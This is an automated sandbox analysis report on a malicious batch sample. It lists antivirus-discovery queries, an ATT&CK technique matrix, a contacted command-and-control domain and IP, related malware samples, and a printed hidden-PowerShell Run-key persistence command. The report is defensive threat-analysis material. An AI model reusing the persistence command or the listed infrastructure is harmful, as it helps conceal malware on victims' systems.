Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

19_2_0000022413908090

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.50.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	12 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Obfuscated Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	11 Scheduled Task/Job	813 Process Injection	1 Software Packing	Security Account Manager	132 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	1 DLL Side-Loading	NTDS	471 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	31 Registry Run Keys / Startup Folder	1 File Deletion	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Rootkit	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	813 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	2 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1.cmd	4%	ReversingLabs
1.cmd	15%	Virustotal		Browse

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
azure-winsecure.com	192.64.119.55	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.10.dr	false	URL Reputation: safe	unknown
http://www.microsoft.co9=	powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq	Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr	false		unknown
https://aka.ms/pscore6	powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://Passport.NET/tb	Microsoft-Windows-LiveId%4Operational.evtx.50.dr	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6xGx	powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.64.119.55	azure-winsecure.com	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525473
Start date and time:	2024-10-04 09:41:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	19
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1.cmd
Detection:	MAL
Classification:	mal100.spyw.evad.winCMD@55/94@1/1
EGA Information:	Successful, ratio: 93.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 70 Number of non-executed functions: 306
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.189.173.21, 20.42.65.92, 52.182.143.212
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2852 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:42:00	API Interceptor	4x Sleep call for process: WMIC.exe modified
03:42:03	API Interceptor	22278x Sleep call for process: powershell.exe modified
03:42:22	API Interceptor	2x Sleep call for process: WerFault.exe modified
03:43:46	API Interceptor	250x Sleep call for process: winlogon.exe modified
03:43:47	API Interceptor	222x Sleep call for process: lsass.exe modified
03:43:47	API Interceptor	1553x Sleep call for process: svchost.exe modified
03:43:49	API Interceptor	198x Sleep call for process: dwm.exe modified
03:44:00	API Interceptor	20x Sleep call for process: cmd.exe modified
03:44:00	API Interceptor	17x Sleep call for process: WMIADAP.exe modified
03:44:00	API Interceptor	20x Sleep call for process: conhost.exe modified
08:43:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
08:43:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
azure-winsecure.com	1 (2).cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	rbx-CO2.bat	Get hash	malicious	Unknown	Browse	154.216.20.132
	SC.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	1.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	2.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	download_2.exe	Get hash	malicious	Quasar	Browse	154.216.20.132

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	162.213.249.216
	https://livelovelead.coach/wp-admin/readme.html	Get hash	malicious	Phisher	Browse	162.0.235.3
	hH4dbIGfGT.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	DHL_ 46773482.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
	Fvqw64NU4k.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	SHIPPING_DOCUMENTS.VBS.vbs	Get hash	malicious	FormBook	Browse	162.213.249.216

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_9f80d8da-31df-4b2c-bcfb-31830925e2b8\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.508739593746198
Encrypted:	false
SSDEEP:	192:7w2ylmGvy9d0eLDkjaVTyJN5Wl4lg6zuiFGZ24lO8n:TygGvykeLDkj+T+5gqg6zuiFGY4lO8n
MD5:	37B792005EDF19E81B1ABF66F4816740
SHA1:	25CE8BA8EC3598029550DF1167F687BA149224E9
SHA-256:	49E129B1A9E5646E7F885D389A8DE9904AEB4E52AF89A5E08C72CB88D346737A
SHA-512:	7B2F533BA9D60EE4ADB1B6E81F0C0825BEE43257CE2B344651D24929D7BE3D6C9874D52065B8595C9A0FBDCEB941D6B41A0B2EFCF63E4D052415AB82FFAE2B7B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.2.8.8.0.8.4.7.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.3.0.0.4.2.8.4.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.8.0.d.8.d.a.-.3.1.d.f.-.4.b.2.c.-.b.c.f.b.-.3.1.8.3.0.9.2.5.e.2.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.a.c.a.5.e.8.-.4.3.c.0.-.4.a.7.3.-.a.d.a.4.-.e.6.c.d.0.8.5.7.d.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.0.4.-.0.0.0.1.-.0.0.1.4.-.a.0.9.8.-.d.5.e.6.3.0.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_fa750e7d-2e62-4703-86c1-e8771ad7fadd\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5087593177022136
Encrypted:	false
SSDEEP:	192:VkbkmGpy9d0eLDkja1TyGcDulAlg6zuiFGZ24lO8n:mjGpykeLDkjOTQD4Cg6zuiFGY4lO8n
MD5:	FAC113DBE19E9E416829F0587F94C759
SHA1:	31F9BCF76E16F2E3B6BF8BDE349FC80747F8C834
SHA-256:	D8A5F4773BAD869F44A72EEC61DD3366B0EF6FE88220DD8F09840002DD1BAF6C
SHA-512:	7105DB3A8A2FAB3103B45DC940E8AD42B7E056DC59057AC7701E011DF7FC33183A6C9234F77F2A3DB86E3A6E90989A83684AC91AF86DCD547966DE1F956B93E6
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.3.3.4.2.8.6.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.4.5.1.4.7.3.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.5.0.e.7.d.-.2.e.6.2.-.4.7.0.3.-.8.6.c.1.-.e.8.7.7.1.a.d.7.f.a.d.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.d.9.e.1.f.-.8.5.6.9.-.4.a.e.6.-.9.3.d.f.-.a.5.7.0.6.f.b.9.0.2.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.d.c.-.0.0.0.1.-.0.0.1.4.-.d.f.1.4.-.6.1.0.7.3.1.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3551.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 4 07:43:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	910700
Entropy (8bit):	3.5216072049855582
Encrypted:	false
SSDEEP:	12288:ZcS70pwchF98ojZaontt1gObqO/Q+5Ax:iS70Ki8iZaot/7q4QU
MD5:	0186EDC09DE9EC5B51F90584832B1AFD
SHA1:	0826BD65936D35E8DC1FB60C15B9F1424D2FF096
SHA-256:	9D41FB17AF3AB8C3638D7F3984A7E00D7AA1BCB026D532059AB1B973DF394967
SHA-512:	FAA26588EC77E295124925D36AEC108CEA3A436C9D2665D0776F6F7C8E2D9154CB851ADEE13AFFF6CBACF365458ED15D4369951A70A28B6270A9DDE0A41D3E44
Malicious:	false
Preview:	MDMP..a..... ..........f............$............'..8........;...2......................`.......8...........T............_..\............m...........o..............................................................................eJ......\|p......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER38BD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
